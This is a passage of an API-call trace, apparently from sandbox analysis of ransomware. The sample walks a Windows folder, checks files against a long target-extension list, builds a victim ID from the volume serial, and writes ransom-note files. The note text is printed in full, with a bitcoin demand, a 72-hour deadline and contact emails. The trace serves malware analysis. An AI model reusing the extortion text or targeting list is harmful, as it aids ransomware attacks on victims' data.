lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.494] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.494] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.494] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.495] CloseHandle (hObject=0xffffffff) returned 1
	[0167.495] CloseHandle (hObject=0xffffffff) returned 1
	[0167.495] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 1
	[0167.495] lstrcmpW (lpString1="superbar.png", lpString2="..") returned 1
	[0167.495] lstrcmpW (lpString1="superbar.png", lpString2=".") returned 1
	[0167.495] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\"
	[0167.495] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="superbar.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"
	[0167.495] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 100
	[0167.495] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.496] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 0x64
	[0167.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.496] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.496] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"
	[0167.496] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 100
	[0167.496] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.497] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0167.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.497] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.498] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.498] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.498] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.500] CloseHandle (hObject=0xffffffff) returned 1
	[0167.500] CloseHandle (hObject=0xffffffff) returned 1
	[0167.500] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 0
	[0167.500] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0167.502] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0167.502] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}"
	[0167.502] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*"
	[0167.502] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.503] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.503] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 115
	[0167.503] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.505] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.505] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.507] CloseHandle (hObject=0x390) returned 1
	[0167.508] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.508] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.508] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0167.509] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.509] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.510] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.510] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.510] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0167.510] CloseHandle (hObject=0x390) returned 1
	[0167.511] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.512] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.512] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.512] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 116
	[0167.512] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
